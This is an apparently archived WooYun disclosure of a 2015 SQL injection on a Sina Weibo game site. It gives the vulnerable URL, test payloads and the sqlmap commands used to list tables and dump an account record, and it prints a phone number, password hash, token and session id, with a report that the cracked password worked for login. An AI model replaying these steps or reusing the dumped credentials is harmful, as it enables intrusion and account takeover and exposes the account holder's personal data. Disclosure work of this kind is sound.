当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096047

漏洞标题:新浪微博某站存在sql注入(158万账户泄漏)

相关厂商:新浪

漏洞作者: kttzd

提交时间:2015-02-06 16:22

修复时间:2015-03-23 16:24

公开时间:2015-03-23 16:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-06: 细节已通知厂商并且等待厂商处理中
2015-02-06: 厂商已经确认,细节仅向厂商公开
2015-02-16: 细节向核心白帽子及相关领域专家公开
2015-02-26: 细节向普通白帽子公开
2015-03-08: 细节向实习白帽子公开
2015-03-23: 细节向公众公开

简要描述:

目测出奇迹

详细说明:

问题站点:
i.game.weibo.cn
注入点:
http://i.game.weibo.cn/appsvc/appsvc.php?bid=13&cmd=packageinfo&package=a5game.leidian2_sinas
测试:
http://i.game.weibo.cn/appsvc/appsvc.php?bid=13 and 0 --&cmd=packageinfo&package=a5game.leidian2_sinas
http://i.game.weibo.cn/appsvc/appsvc.php?bid=13 and 1 --&cmd=packageinfo&package=a5game.leidian2_sinas
存在注入,使用sqlmap跑一下
sqlmap -u "http://i.game.weibo.cn/appsvc/appsvc.php?bid=13&cmd=packageinfo&package=a5game.leidian2_sinas" -p bid

新浪_01.png


available databases [3]:
[*] game_center
[*] information_schema
[*] test


查看game_center里面

+---------------------------+
| admin_access_control_list |
| admin_resources |
| admin_roles |
| admin_users |
| base_config |
| cms_app |
| cms_app_base_content |
| cms_app_content |
| cms_app_content_version |
| cms_app_pt_map |
| cms_app_res |
| cms_biz_app |
| cms_biz_app_prop_val |
| cms_biz_app_tag |
| cms_biz_category |
| cms_biz_chart_app |
| cms_biz_charts |
| cms_biz_events |
| cms_biz_events_imgs |
| cms_biz_property |
| cms_biz_report |
| cms_business |
| cms_platform |
| cms_taglib |
| cooper_info |
| cooper_ratio |
| event_awards |
| event_draw_log |
| event_user |
| product_slow |
| sdk_msg |
| sng_apk_info |
| sng_noticelist |
| sso_user_auth |
| term_rom |
| term_screen |
| term_system |
+---------------------------+


其中admin_users明文存储
sqlmap -u "http://i.game.weibo.cn/appsvc/appsvc.php?bid=13&cmd=packageinfo&package=a5game.leidian2_sinas" -p bid -T game_center -T sso_user_auth --count

新浪_02.png


Database: game_center
Table: sso_user_auth
[11 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| createtime | datetime |
| gsid | varchar(30) |
| id | int(11) |
| machineid | varchar(50) |
| mobile | varchar(15) |
| modifytime | datetime |
| name | varchar(30) |
| pw | varchar(32) |
| texpire | datetime |
| token | varchar(32) |
| uid | varchar(20) |
+------------+-------------+


任意读取一个账户
sqlmap -u "http://i.game.weibo.cn/appsvc/appsvc.php?bid=13&cmd=packageinfo&package=a5game.leidian2_sinas" -p bid -T game_center -T sso_user_auth --dump --start 10000 --stop 10000

+-------+------------+-----------------------------+----------------------------------+----------------------------------+-------------+----------------------------------+-------------+---------------------+---------------------+---------------------+
| id | uid | gsid | machineid | pw | name | token | mobile | texpire | createtime | modifytime |
+-------+------------+-----------------------------+----------------------------------+----------------------------------+-------------+----------------------------------+-------------+---------------------+---------------------+---------------------+
| 10043 | 3848812356 | 4u8860cc6ENzM33DYFUnog9fC5K | 772a1b0042768a4ccab72c058145ab47 | e807f1fcf82d132f9bb018ca6738a19f | 13545060302 | 4420d17727b1b2f9d01d8ed9c6ff5da6 | 13545060302 | 2013-11-12 19:33:13 | 2013-10-12 19:33:13 | 2013-10-12 19:33:13 |
+-------+------------+-----------------------------+----------------------------------+----------------------------------+-------------+----------------------------------+-------------+---------------------+---------------------+---------------------+


账户13545060302 密码md5解出来是1234567890
登录新浪微博

漏洞证明:

新浪_03.png


这个应该是测试账户,如果说都是测试账户的话,分分种给别人加几十万僵尸粉应该不是问题...
未继续深入

修复方案:

你们更懂 ><

版权声明:转载请注明来源 kttzd@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-02-06 22:21

厂商回复:

是某业务游客临时使用帐号,感谢关注新浪安全。

最新状态:

暂无